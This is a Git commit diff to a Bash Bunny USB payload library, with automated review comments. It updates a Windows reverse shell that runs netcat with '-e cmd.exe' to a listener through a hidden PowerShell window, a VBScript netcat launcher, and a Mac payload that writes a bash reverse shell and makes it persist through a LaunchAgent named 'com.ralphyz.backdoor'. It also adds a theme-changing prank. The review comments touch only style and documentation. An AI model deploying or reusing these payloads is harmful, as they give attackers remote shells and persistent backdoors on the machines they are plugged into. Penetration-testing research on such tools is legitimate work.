Updated payloads for fw v1.1 (#176)

* Mac Reverse Shell

Starts a terminal window on a Mac, then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Mac Reverse Shell

Starts a terminal window on a Mac, then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Fixed additional MacReverseShell

* Added readme.md files

* Added readme.md files

* Added readme.md

* Added readme.md files

* Added readme.md files

* Updated for firmware 1.1

* Updated for firmware 1.1

* Added ThemeChanger and updated for firmware 1.1

* Updated readme.md

* Updated for firmware 1.1 - using RUN command

* Fixed issues with the new RUN - reverted

* Fixed a few script problems

* removed binary and updated readme.md

* added a check for themepack

* edited themechanger readme

* updated readme.md and version
pull/207/head
RalphyZ 2017-04-28 18:49:35 -04:00 committed by Sebastian Kinne
parent ca9e53c5a8
commit 750d384df7
9 changed files with 278 additions and 55 deletions

View File

@ -3,7 +3,7 @@ Option Explicit
'============================================================================== '==============================================================================
' Title: a.vbs ' Title: a.vbs
' Author: RalphyZ ' Author: RalphyZ
' Version: 1.0 ' Version: 1.1
' Target: Windows 7+ ' Target: Windows 7+
' '
' Description: ' Description:
@ -16,7 +16,8 @@ Option Explicit
' listeners while doing a PenTest, and grab multiple reverse ' listeners while doing a PenTest, and grab multiple reverse
' shells in one trip. Uncomment that if you want the auto-increment ' shells in one trip. Uncomment that if you want the auto-increment
' '
' Note: You must put the netcat executable in the strReverseShellPath directory ' Note: You must put the netcat executable in the switch directory with this
' script in order for it to work
'============================================================================== '==============================================================================
' Declare Constants ' Declare Constants
@ -26,14 +27,11 @@ Const ForWriting = 2
' Declare Global Variables ' Declare Global Variables
Dim strListenerPort, strNewListenerPort, strListenerIP Dim strListenerPort, strNewListenerPort, strListenerIP
Dim objFSO, objFile, strCurrentDirectory Dim objFSO, objFile, strCurrentDirectory
Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile Dim strNetCatEXE, strListnerPortFile, strListenerIPFile
' The netcat executable name ' The netcat executable name
strNetCatEXE = "nc.exe" strNetCatEXE = "nc.exe"
' The folder location
strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
' The file containing the listener port ' The file containing the listener port
strListnerPortFile = "listener_port.txt" strListnerPortFile = "listener_port.txt"
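Review bot: dropping `strReverseShellPath` here means the folder base is now hard-coded twice inside `FindCurrentDirectory` (`\payloads\switch1\` and `\payloads\switch2\`); keep a single constant for the `\payloads\` base (or a list of switch names) so the location is defined in one place, as the removed variable did. While these declarations are being touched, `strListnerPortFile` is missing an `e` (`strListenerPortFile`), which would match the neighbouring `strListenerIPFile`.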
@ -43,7 +41,11 @@ strListenerIPFile = "listener_ip.txt"
' Create a File System Object ' Create a File System Object
Set objFSO = CreateObject("Scripting.FileSystemObject") Set objFSO = CreateObject("Scripting.FileSystemObject")
strCurrentDirectory = FindCurrentDirectory() ' Set default value
strCurrentDirectory = ""
' The folder location
FindCurrentDirectory
' Read the Host IP Address (where the listener resides) ' Read the Host IP Address (where the listener resides)
ReadHostIP ReadHostIP
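Review bot: the comment `' The folder location` now sits above the bare `FindCurrentDirectory` call, but that line no longer defines a folder; the comment that fits is the one the sub already carries (locate nc.exe and set `strCurrentDirectory`). Likewise `' Set default value` above `strCurrentDirectory = ""` should say what that default means: it is the value left behind when nc.exe is found on no drive, which is what a later check would have to test for.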
@ -64,20 +66,21 @@ StartNetCat
' Return Value: None ' Return Value: None
' Description: Find the netcat executable ' Description: Find the netcat executable
'============================================================================== '==============================================================================
Function FindCurrentDirectory sub FindCurrentDirectory
Dim objDrives, d Dim objDrives, d
' Set default return value
FindCurrentDirectory = ""
' Search all drives for the netcat exe ' Search all drives for the netcat exe
Set objDrives = objFSO.Drives Set objDrives = objFSO.Drives
For Each d in objDrives For Each d in objDrives
If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then If (objFSO.FileExists(d + "\payloads\switch1\" + strNetCatEXE)) Then
FindCurrentDirectory = d + strReverseShellPath strCurrentDirectory = d + "\payloads\switch1\"
exit sub
ElseIf (objFSO.FileExists(d + "\payloads\switch2\" + strNetCatEXE)) Then
strCurrentDirectory = d + "\payloads\switch2\"
exit sub
End if End if
Next Next
End Function End Sub
'============================================================================== '==============================================================================
' Name: ReadHostIP ' Name: ReadHostIP
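Review bot: the procedure header above this sub still reads `Return Value: None` / `Description: Find the netcat executable` but says nothing about the side effect this change introduces: `FindCurrentDirectory` now writes the global `strCurrentDirectory` instead of returning a value. State that in the header so the caller's dependency on the global is visible. Style: `sub FindCurrentDirectory` and `exit sub` are lowercase while the closing line is `End Sub` and every other keyword in the file is capitalised (`Function`, `Set`, `For Each`, `End if`).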

View File

@ -2,34 +2,45 @@
# #
# Title: RAZ_VBScript # Title: RAZ_VBScript
# Author: RalphyZ # Author: RalphyZ
# Version: 1.0 # Version: 1.1
# Target: Windows 7+ # Target: Windows 7+
# Dependencies: VBScript (a.vbs) in the switch folder with this file # Dependencies: VBScript (a.vbs) in the switch folder with this file
# #
# Description: Executes a VBScript, concealed in a hidden PowerShell window # Description: Executes a VBScript, concealed in a hidden PowerShell window
# #
# Colors: # Colors:
# Green.....................Working # | Status | Color | Description |
# White.....................Completed without error # | ---------- | ------------------------------| ------------------------------------------------ |
# Light-Blue (blinking).....a.vbs was not found # | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# | FAIL | Red slow blink | Could not find the a.vbs script |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
LED G # Magenta solid
LED SETUP
# Set the attack mode
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
# Get the switch position # Get the switch position
source bunny_helpers.sh GET SWITCH_POSITION
# Check if a.vbs is present Check if a.vbs is present
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
LED B G 100 LED FAIL
exit 1 exit 1
fi fi
# Start the attack - yellow single blink
LED ATTACK
# Run the VBScript # Run the VBScript
QUACK GUI r QUACK GUI r
QUACK DELAY 100 QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')" QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs') -e cmd.exe"
QUACK ENTER QUACK ENTER
# Green LED for finished
LED R G B # Green 1000ms VERYFAST blink followed by SOLID
LED FINISH
exit 0
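Review bot: the comment marker was lost on the new side of `# Check if a.vbs is present`: the right-hand column reads `Check if a.vbs is present`, which bash will try to run as a command named `Check` before reaching the `if` test. Restore the leading `#`. The new `QUACK STRING` line also appends `-e cmd.exe` after the `a.vbs` path, which neither the header (`Executes a VBScript, concealed in a hidden PowerShell window`) nor the README mention; either document what a.vbs does with those arguments or keep the invocation as it was in 1.0.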

View File

@ -0,0 +1,31 @@
# RAZ_VBScript
* Author: RalphyZ
* Version: 1.1
* Target: Windows 7+
* Category: Execution
* Attackmode: HID, STORAGE
## Change Log
| Version | Changes |
| ------- | ------------------------------|
| 1.1 | Updated for firmware 1.1 |
| 1.0 | Initial release |
## Dependencies
The following files must exist in the switch folder:
a.vbs - VBScript to be executed in a hidden Powershell window
## Description
VBScript (a.vbs) in the switch folder with this file
## Configuration
None
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| FAIL | Red slow blink | Could not find the a.vbs script |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |
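Review bot: the `## Description` section (`VBScript (a.vbs) in the switch folder with this file`) is the dependency line repeated, not a description; the payload header already has the sentence that belongs here (`Executes a VBScript, concealed in a hidden PowerShell window`). Minor: `Powershell` under Dependencies should be `PowerShell`, and the line `a.vbs - VBScript to be executed ...` renders as plain paragraph text in Markdown unless it is made a list item, as the `*` lines at the top of the file already are.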

View File

@ -0,0 +1,48 @@
#!/bin/bash
#
# Title: Change windows theme
# Author: sil3n7h
# Version: 1.2
# Target: Windows 7+
#
# Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder
# in the payloads library of the Bash Bunny USB Disk partition.
#
# Colors:
# | Status | Color | Description |
# | ---------- | ------------------------------| ------------------------------------------------ |
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# | FAIL1 | Red slow blink | Could not find the theme.themepack file |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
# Magenta solid
LED SETUP
# Get the switch position
GET SWITCH_POSITION
# Check for all the files - error if not found. If found, put into variables
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/theme.themepack" ] ; then
LED FAIL1
exit 1
fi
# Set the attack mode to HID and STORAGE
ATTACKMODE HID STORAGE
# Yellow single blink
LED ATTACK
# Run the command to change the theme
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\theme.themepack')"
QUACK ENTER
# Wait a bit so that the correct window closes
QUACK DELAY 15000
QUACK ALT F4
# Green LED for finished
LED FINISH
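Review bot: the header says the theme is executed `from the RAZ_ThemeChanger folder in the payloads library`, but the file check and the `QUACK STRING` both use the switch folder (`payloads/${SWITCH_POSITION}/theme.themepack`); update the header to match the code. Two comments are copied from the reverse-shell payload and do not apply here: the `ATTACK` row says `Running the VBScript` (this payload opens a themepack), and `Check for all the files - error if not found. If found, put into variables` describes a single check that sets no variables.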

View File

@ -0,0 +1,34 @@
# RAZ_ThemeChanger
* Author: sil3n7h
* Version: 1.2
* Target: Windows 7+
* Category: Prank
* Attackmode: HID, STORAGE
## Change Log
| Version | Changes |
| ------- | ---------------------------------------|
| 1.2 | Updated docs and check for themepack |
| 1.1 | Updated for firmware 1.1 |
| 1.0 | Initial release |
## Dependencies
The following files must exist in the switch folder:
theme.themepack - The Windows theme file used to set the wallpaper and colors of the screen.
Note: themepack files are windows zipfiles which contain wallpapers and other files (screensavers, sounds, etc). You can export your own themepack using Windows GUIs. Just look it up `exporting a windows themepack`.
## Description
Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder in the payloads library of the Bash Bunny USB Disk partition.
## Configuration
None
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| FAIL1 | Red slow blink | Could not find the theme.themepack file |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |
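Review bot: same mismatch as in the payload header: `## Description` says the theme comes from `the RAZ_ThemeChanger folder in the payloads library`, while `## Dependencies` (correctly, given the script's `payloads/${SWITCH_POSITION}` path) says it must be in the switch folder; keep one. The `ATTACK` row's `Running the VBScript` should describe what this payload actually does at that step (opening theme.themepack), and `windows zipfiles` should read `Windows zip files`.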

View File

@ -2,7 +2,7 @@
# #
# Title: RAZ_MacReverseShell # Title: RAZ_MacReverseShell
# Author: RalphyZ # Author: RalphyZ
# Version: 1.1 # Version: 1.2
# Target: Mac OSX # Target: Mac OSX
# Dependencies: None # Dependencies: None
# #
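Review bot: this bumps the payload header to `Version: 1.2`, but the readme.md added for RAZ_MacReverseShell in the same commit says `Version 1.1.1` and its change log entry reads `Updated for firmware 1.1.1`, while the commit title says firmware 1.1. Align the header, the readme version line and the change log before merging.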
@ -12,8 +12,14 @@
# user-defined interval # user-defined interval
# #
# Colors: # Colors:
# Green (blinking)..........Working # | Status | Color | Description |
# White.....................Completed without error # | ---------- | ------------------------------| ------------------------------------------------ |
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
#Magenta solid
LED SETUP
# Edit this to point to the NetCat Listener # Edit this to point to the NetCat Listener
LISTENER_IP="192.168.1.100" LISTENER_IP="192.168.1.100"
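Review bot: the new `Colors` table is copied from the Windows payloads: the `ATTACK` row says `Running the VBScript`, but this payload has no VBScript (it types into the Mac Terminal, per the `Start the Mac Terminal` comment further down). Describe the actual step. Style: `#Magenta solid` lacks the space after `#` that every other comment in the file uses.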
@ -24,15 +30,15 @@ FREQUENCY="60"
#----Proceed with Caution------------------------------------------------------ #----Proceed with Caution------------------------------------------------------
# Green blinking LED
LED G 100
# Human Interface Device # Human Interface Device
ATTACKMODE HID ATTACKMODE HID
# Emulate the Ducky - QUACK! # Emulate the Ducky - QUACK!
QUACK DEFAULT_DELAY 300 QUACK DEFAULT_DELAY 300
# Start the attack - yellow single blink
LED ATTACK
# Start the Mac Terminal # Start the Mac Terminal
QUACK COMMAND SPACE QUACK COMMAND SPACE
QUACK STRING terminal QUACK STRING terminal
@ -53,7 +59,7 @@ QUACK ENTER
QUACK DELAY 500 QUACK DELAY 500
# Add to the Launch Agents # Add to the Launch Agents
QUACK STRING printf \"\<plist version=\\\"1.0\\\"\>\\n \<dict\>\\n \<key\>Label\</key\>\\n \<string\>com.ralphyz.backdoor\</string\>\\n \<key\>ProgramArguments\</key\>\\n \<array\>\\n \<string\>/bin/sh\</string\>\\n \<string\>/tmp/s.sh\</string\>\\n \</array\>\\n \<key\>RunAtLoad\</key\>\\n \<true/\>\\n \<key\>StartInterval\</key\>\\n \<integer\>${FREQUENCY}\</integer\>\\n \<key\>AbandonProcessGroup\</key\>\\n \<true/\>\\n \</dict\>\\n\</plist\>\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist QUACK STRING printf \"\<plist version=\\\"1.0\\\"\>\<dict\>\<key\>Label\</key\>\<string\>com.ralphyz.backdoor\</string\>\<key\>ProgramArguments\</key\>\<array\>\<string\>/bin/sh\</string\>\<string\>/tmp/s.sh\</string\>\</array\>\<key\>RunAtLoad\</key\>\<true/\>\<key\>StartInterval\</key\>\<integer\>${FREQUENCY}\</integer\>\<key\>AbandonProcessGroup\</key\>\<true/\>\</dict\>\\n\</plist\>\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist
QUACK ENTER QUACK ENTER
QUACK DELAY 500 QUACK DELAY 500
@ -64,5 +70,6 @@ QUACK ENTER
# Close the Terminal Window # Close the Terminal Window
QUACK COMMAND q QUACK COMMAND q
# White LED for finished # Green 1000ms VERYFAST blink followed by SOLID
LED R G B LED FINISH
exit 0

View File

@ -0,0 +1,39 @@
# RAZ_MacReverseShell
* Author: RalphyZ
* Version: Version 1.1.1
* Target: Mac OSX
* Category: Reverse Shell
* Attackmode: HID
## Change Log
| Version | Changes |
| ------- | ---------------------------------------- |
| 1.1.1 | Updated for firmware 1.1.1 |
| 1.1 | Added variables for easier customization |
| 1.0 | Initial release |
## Dependencies
None
## Description
Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, /tmp/s.sh. It then adds the script to the Launch Agent - establishing persistence - running at startup
## Configuration
Set the location of your listener:
LISTENER_IP="192.168.1.100"
LISTENER_PORT="4444"
Set the frequency you want the script to run (in minutes)
FREQUENCY="60"
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |
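Review bot: `* Version: Version 1.1.1` repeats the word `Version`, and the number disagrees with the payload header (`1.2`) changed in this same commit. Under `## Configuration`, `Set the frequency you want the script to run (in minutes)` does not match the payload, which writes `FREQUENCY` into the launchd `StartInterval` key, whose value is in seconds; say seconds here. The `LISTENER_IP=`, `LISTENER_PORT=` and `FREQUENCY=` lines are not in a code block, so Markdown will run them together with the surrounding sentences. Also `Mac,then` is missing a space, and `running at startup` leaves out the interval that the payload header (`user-defined interval`) describes.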

View File

@ -13,63 +13,69 @@
# Intentionally, this script leaves a trace in the Run Box # Intentionally, this script leaves a trace in the Run Box
# #
# Colors: # Colors:
# Green.....................Working # | Status | Color | Description |
# White.....................Completed without error # | ---------- | ------------------------------| ------------------------------------------------ |
# White (blinking)..........Incrementing the port in listener_port.txt # | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# Blue (blinking)...........listener_port.txt was not found # | FAIL1 | Red slow blink | Could not find the listener_port.txt file |
# Light-Blue (blinking).....listener_ip.txt was not found # | FAIL2 | Red fast blink | Could not find the listener_ip.txt file |
# Amber (blinking)..........nc.exe was not found # | FAIL3 | Red very fast blink | Could not find the nc.exe file |
# | SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
# Magenta solid
LED SETUP
# Change this if you want to enable auto_increment of the netcat port # Change this if you want to enable auto_increment of the netcat port
# If true, the port number is increased by 1 everytime the script runs # If true, the port number is increased by 1 everytime the script runs
# This is good for Red Teams doing PenTesting on multiple computers # This is good for Red Teams doing PenTesting on multiple computers
auto_increment=false auto_increment=false
LED G # Set attack mode to HID and Storage
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
LANGUAGE='us'
# Get the switch position # Get the switch position
source bunny_helpers.sh GET SWITCH_POSITION
# Check for all the files - error if not found. If found, put into variables # Check for all the files - error if not found. If found, put into variables
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then
LED B 100 LED FAIL1
exit 1 exit 1
else else
my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt`
fi fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then
LED B G 100 LED FAIL2
exit 1 exit 1
else else
my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt`
fi fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then
LED R G 100 LED FAIL3
exit 1 exit 1
fi fi
# Start the attack - yellow single blink
LED ATTACK
# Execute the powershell command in the run box with the appropriate variables # Execute the powershell command in the run box with the appropriate variables
QUACK GUI r QUACK GUI r
QUACK DELAY 100 QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe" QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\"
QUACK ENTER QUACK ENTER
# If auto_increment, then update the listener_port file # If auto_increment, then update the listener_port file
if [ "$auto_increment" = true ] ; then if [ "$auto_increment" = true ] ; then
LED R G B 100 LED SPECIAL
echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt
# Allow the write to sync to the USB # Allow the write to sync to the USB
sleep 1 sleep 1
fi fi
# Signal everything went OK - white # Green 1000ms VERYFAST blink followed by SOLID
LED R G B LED FINISH
exit 0 exit 0
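Review bot: the `ATTACK` row in the new table says `Running the VBScript`, but this payload launches `nc.exe` through the Run box (the `QUACK STRING ... nc.exe` line below); describe that step instead. The removal of `LANGUAGE='us'` is not reflected in the README change log (`Updated for firmware 1.1`); call it out there so it is a visible part of the change. Typo in the kept comment: `everytime` should be `every time`.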

View File

@ -0,0 +1,44 @@
# RAZ_ReverseShell
* Author: RalphyZ
* Version: 1.1
* Target: Windows 7+
* Category: Reverse Shell
* Attackmode: HID, STORAGE
## Change Log
| Version | Changes |
| ------- | ------------------------------|
| 1.1 | Updated for firmware 1.1 |
| 1.0 | Initial release |
## Dependencies
The following files must exist in the switch folder:
nc.exe - Windows binary for netcat with the -e flag
Find nc.exe on Kali, or on NMap's website: http://nmap.org/ncat
listener_port.txt - The Port number for the netcat listener
listener_ip.txt - The IP Address for the netcat listener
## Description
Executes a netcat reverse cmd shell at a given IP and Port. This script leaves a trace in the Run Box. The script can auto-increment the listener port so that the PenTester can create several listeners, and target multiple machines while on a walkabout in an office.
## Configuration
Set the location of your listener in the listener_ip and listener_port text files.
If you want the listener port to auto-increment, set:
auto_increment=true
## Colors
| Status | Color | Description |
| ---------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| FAIL1 | Red slow blink | Could not find the listener_port.txt file |
| FAIL2 | Red fast blink | Could not find the listener_ip.txt file |
| FAIL3 | Red very fast blink | Could not find the nc.exe file |
| SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt |
| ATTACK | Yellow single blink | Running the VBScript |
| FINISH | Green blink followed by SOLID | Script is finished |
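Review bot: the `ATTACK` row again says `Running the VBScript`; this payload runs nc.exe. The `## Dependencies` and `## Configuration` sections put each item on its own line (`nc.exe - ...`, `listener_port.txt - ...`, `auto_increment=true`), but without list markers or a code fence Markdown renders them as one paragraph; make the dependency lines a `*` list (the file already uses `*` for the metadata lines) and put `auto_increment=true` in a code span. `NMap` should be `Nmap`.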